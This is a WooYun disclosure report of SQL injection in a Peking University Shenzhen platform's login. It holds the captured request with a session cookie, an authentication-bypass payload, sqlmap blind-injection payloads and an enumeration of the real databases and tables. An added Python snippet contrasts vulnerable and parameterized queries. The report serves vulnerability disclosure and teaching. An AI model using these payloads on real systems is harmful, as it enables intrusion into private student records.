WooYun (WooYun.org) historical vulnerability search---http://wy.zone.ci/
WooYun Drops articles, online reading--------http://drop.zone.ci/
2015-12-04: Details have been sent to the vendor and are awaiting the vendor's handling
2015-12-04: The vendor has confirmed; details are disclosed to the vendor only
2015-12-14: Details disclosed to core white hats and experts in related fields
2015-12-24: Details disclosed to regular white hats
2016-01-03: Details disclosed to intern white hats
2016-01-18: Details disclosed to the public
As the title says.
There is quite a lot of information in it.
http://ss.pkusz.edu.cn/ Peking University Shenzhen Graduate School information management platform
POST /session HTTP/1.1
Content-Length: 258
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://ss.pkusz.edu.cn
Cookie: _fullcalendar_session=BAh7CDoQX2NzcmZfdG9rZW4iMWdlZFdjMWxHNTVIaTAvVGdBK2VKV1hOTUQ0UGlyYURoU0dremZTUE90S0E9Og9zZXNzaW9uX2lkIiVmMGU5NzY5ZjMyNTU2ZjQzZDYzZjdlMDQyOTI0ZDkwYSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiAAY6CkB1c2VkewY7CEY%3D--3f770cdecb7e412a71d3109111cb0f5579c54b03
Host: ss.pkusz.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

authenticity_token=gedWc1lG55Hi0/TgA%2beJWXNMD4PiraDhSGkzfSPOtKA%3d&image=xCDC&login=*&password=g00dPa%24%24w0rD&yanzhengma=1
The login parameter is injectable. Having found that, I tried the classic "universal password": admin' or 1=1 or '1'='1 as the login with any password at all, and that was enough to get in...
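As an added illustration (not code from the report or from the affected platform), the Python script below reproduces the authentication-bypass pattern described above against a constructed in-memory SQLite stand-in for a users table: one login check built by string interpolation, and the same check with bound parameters. The table layout, column names and credentials are assumptions; the login payload is the one quoted in the report.

```python
import sqlite3

# Constructed stand-in for a users table (assumed schema, not the platform's).
# Plaintext passwords are used only to keep the demonstration short; a real
# application stores a salted hash and compares against that.
SETUP_SQL = """
CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT NOT NULL, password TEXT NOT NULL);
INSERT INTO users (login, password) VALUES ('admin', 'correct-horse-battery'),
                                          ('student1', 'another-secret');
"""

# Payload quoted in the report: the quote closes the login string and the
# rest appends an always-true disjunction, so the password clause is irrelevant.
BYPASS_LOGIN = "admin' or 1=1 or '1'='1"


def make_db():
    """Create the constructed in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SETUP_SQL)
    return conn


def login_vulnerable(conn, login, password):
    """WHERE clause assembled by string interpolation (the bug class reported).
    Returns the matched login name, or None when no row matches."""
    sql = f"SELECT login FROM users WHERE login = '{login}' AND password = '{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, login, password):
    """Same query with bound parameters: the driver passes user input as data,
    so quote characters in the input never reach the SQL parser as syntax."""
    sql = "SELECT login FROM users WHERE login = ? AND password = ?"
    row = conn.execute(sql, (login, password)).fetchone()
    return row[0] if row else None


def demo():
    """Run the bypass payload through both implementations and a valid login
    through the hardened one; returns the three outcomes for inspection."""
    conn = make_db()
    return {
        "vulnerable_bypass": login_vulnerable(conn, BYPASS_LOGIN, "whatever"),
        "parameterized_bypass": login_parameterized(conn, BYPASS_LOGIN, "whatever"),
        "parameterized_valid": login_parameterized(conn, "admin", "correct-horse-battery"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

With the interpolated query the payload yields `WHERE login = 'admin' or 1=1 or '1'='1' AND password = 'whatever'`; because AND binds tighter than OR, every row satisfies the condition and the first one (admin) is returned. The parameterized version treats the whole payload as a literal login value, finds no such user and returns None, while the genuine credentials still authenticate.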
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: authenticity_token=gedWc1lG55Hi0/TgA+eJWXNMD4PiraDhSGkzfSPOtKA=&image=xCDC&login=-7215') OR 8985=8985 AND ('arKE'='arKE&password=g00dPa$$w0rD&yanzhengma=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: authenticity_token=gedWc1lG55Hi0/TgA+eJWXNMD4PiraDhSGkzfSPOtKA=&image=xCDC&login=') AND (SELECT * FROM (SELECT(SLEEP(5)))tofu) AND ('OXFj'='OXFj&password=g00dPa$$w0rD&yanzhengma=1
---
web server operating system: Linux Ubuntu 11.04 (Natty Narwhal)
web application technology: Apache 2.2.17
back-end DBMS: MySQL 5.0.12
current user: 'root@localhost'
current database: 'fullcalendarbranch'
current user is DBA: True
available databases [13]:
[*] atutor
[*] canvas_development
[*] canvas_production
[*] canvas_queue_development
[*] canvas_queue_production
[*] crmfullcalendar
[*] emailer
[*] fullcalendarbranch
[*] fullcalendarbranch_test
[*] information_schema
[*] moodle
[*] mysql
[*] tourism
Database: fullcalendarbranch
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| evaluation_students_answers      | 940161  |
| courses_stu_reg_infs             | 70468   |
| events                           | 27150   |
| course_act_logs                  | 23556   |
| student_registers                | 18971   |
| stu_payments                     | 18535   |
| register_infos                   | 13686   |
| tuitions                         | 12005   |
| oce_scores                       | 11545   |
| self_words_answers               | 7653    |
| stu_reg_infs                     | 7559    |
| stu_work_infs                    | 7537    |
| stu_bedrooms                     | 7137    |
| water_payments                   | 7099    |
| scbb_infos                       | 7040    |
| users                            | 6587    |
| temp_fees                        | 5685    |
| stu_bedroom_xuanfangs            | 5503    |
| reports                          | 5218    |
| rcrm_accounts_contacts           | 5191    |
| referrals                        | 4223    |
| rcrm_accounts                    | 4139    |
| verifies                         | 3748    |
| areas                            | 3525    |
| student_fees                     | 3073    |
| scholarships                     | 2590    |
| education_histories              | 2373    |
| news_checks_rcrm_leads           | 2322    |
| oce_tuitions                     | 2241    |
| colleges                         | 2223    |
| homeworks_students               | 2157    |
| oce_infos                        | 2130    |
| lead_users                       | 1962    |
| course_cmodules                  | 1806    |
| sam_events                       | 1782    |
| internships                      | 1776    |
| courses                          | 1631    |
| event_series                     | 1616    |
| bedrooms_standard_payments       | 1552    |
| bedroom_xuanfangs                | 1479    |
| worker_payments                  | 1427    |
| logs                             | 1262    |
| bedrooms                         | 1242    |
| rcrm_leads                       | 1189    |
| evaluation_paper_course_cmodules | 1175    |
| stu_reg_inf_tmodule_teachers     | 1162    |
| work_records                     | 1124    |
| university_courses               | 1078    |
| class_cmodules                   | 1020    |
| worker_infs                      | 990     |
| update_files                     | 962     |
| phbs_edpstudents                 | 917     |
| lead_users_rcrm_batches          | 863     |
| exc_answers                      | 833     |
| event_retunes                    | 702     |
| temp_fee_stls                    | 669     |
| loan_datas                       | 644     |
| teachers                         | 634     |
| event_series_staffs              | 570     |
| stu_apply_prizes                 | 567     |
| exc_scores                       | 564     |
| rcrm_meetings_leads              | 544     |
| courses_teachers                 | 461     |
| stu_reg_infs_teams               | 420     |
| roles_users                      | 405     |
| staffs                           | 405     |
| docus                            | 403     |
| oce_tk_scores                    | 399     |
| change_bedrooms                  | 388     |
| cities                           | 377     |
| train_plans                      | 363     |
| permissions_roles                | 361     |
| rcrm_accounts_bugs               | 357     |
| classroom_users                  | 336     |
| phbs_edpstudent_pays             | 334     |
| course_times                     | 293     |
| stu_tmodule_teacher_reals        | 287     |
| apply_excels                     | 278     |
| rcrm_campaign_logs               | 269     |
| loans                            | 268     |
| countries                        | 240     |
| oce_uploadfiles                  | 240     |
| contries                         | 239     |
| apply_awards                     | 217     |
| bnews_checks_rcrm_leads          | 200     |
| cnews_checks_rcrm_leads          | 200     |
| dnews_checks_rcrm_leads          | 200     |
| anews_checks_rcrm_leads          | 199     |
| enews_checks_rcrm_leads          | 199     |
| evaluation_questions             | 182     |
| exc_batch_stus                   | 180     |
| tmodule_teachers                 | 156     |
| permissions                      | 145     |
| anews_checks                     | 134     |
| bnews_checks                     | 134     |
| cnews_checks                     | 134     |
| dnews_checks                     | 134     |
| enews_checks                     | 134     |
| news_checks                      | 134     |
| cmodules                         | 132     |
| classrooms                       | 129     |
| oce_major_courses                | 119     |
| temp_qianfeis                    | 114     |
| staff_bedrooms                   | 112     |
| rcrm_leads_trades                | 106     |
| homeworks                        | 101     |
| exc_batch_schools                | 98      |
| student_classes                  | 96      |
| quales_rcrm_leads                | 93      |
| award_assigns                    | 92      |
| tuition_standards                | 86      |
| floors                           | 79      |
| messages                         | 72      |
| phbs_pcourses                    | 72      |
| schema_migrations                | 70      |
| facebooks                        | 69      |
| exc_schools                      | 65      |
| step_change_bedrooms             | 60      |
| class_teachers                   | 58      |
| nations                          | 58      |
| oce_courses                      | 55      |
| apply_exgraduates                | 53      |
| rcrm_status                      | 47      |
| evaluation_question_types        | 42      |
| phbs_contract_pays               | 36      |
| trades                           | 35      |
| provinces                        | 34      |
| services                         | 34      |
| roles                            | 33      |
| interns                          | 32      |
| courses_student_classes          | 30      |
| standard_payments                | 30      |
| majors                           | 29      |
| rmodules                         | 29      |
| phbs_contracts                   | 25      |
| sam_teams                        | 24      |
| depts_users                      | 23      |
| exc_batch_teachers               | 21      |
| lead_user_infos                  | 21      |
| npositions                       | 21      |
| stu_sources                      | 21      |
| evaluation_answers               | 16      |
| phbs_companies                   | 16      |
| event_categories                 | 15      |
| mbatrades                        | 15      |
| sam_instruments                  | 15      |
| socials                          | 14      |
| course_covers                    | 13      |
| universities                     | 13      |
| choose_bedroom_times             | 12      |
| enterprises                      | 12      |
| rcrm_meetings                    | 12      |
| award_standards                  | 11      |
| depts                            | 11      |
| facebooks_copy                   | 11      |
| info_ways                        | 10      |
| phbs_edpdepts                    | 10      |
| techangs                         | 10      |
| evaluation_papers                | 9       |
| locations                        | 9       |
| rcrm_meetings_users              | 9       |
| evaluates                        | 8       |
| exc_questions                    | 8       |
| self_words                       | 8       |
| stucourses                       | 8       |
| notice_types                     | 7       |
| notices                          | 7       |
| quales                           | 7       |
| register_terms                   | 7       |
| sm_moduls                        | 7       |
| specialties                      | 7       |
| wagecategories                   | 7       |
| course_objects                   | 6       |
| rcrm_batches                     | 6       |
| remarks                          | 6       |
| studystatus                      | 6       |
| buildings                        | 5       |
| mbaquales                        | 5       |
| oce_majors                       | 5       |
| tc_levels                        | 5       |
| teams                            | 5       |
| tmodules                         | 5       |
| user_infos                       | 5       |
| evaluation_answer_types          | 4       |
| mentor_students                  | 4       |
| phbs_activity_teachers           | 4       |
| phbs_service_types               | 4       |
| projects_staffs                  | 4       |
| invoice_nos                      | 3       |
| news_types                       | 3       |
| phbs_activities                  | 3       |
| phbs_service_type_teachers       | 3       |
| registstatus                     | 3       |
| stu_informations                 | 3       |
| styles                           | 3       |
| class_tmodules                   | 2       |
| event_series_teachers            | 2       |
| exams_students                   | 2       |
| exc_batches                      | 2       |
| fires                            | 2       |
| projects                         | 2       |
| exams                            | 1       |
| excels                           | 1       |
| mentors                          | 1       |
| oce_configs                      | 1       |
| statues                          | 1       |
+----------------------------------+---------+
On top of that the database user has DBA privileges, so writing a shell would not have been appropriate. Hoping for a high rank...
Severity level: High
Vulnerability Rank: 10
Confirmation time: 2015-12-04 12:15
Thank you very much!
None yet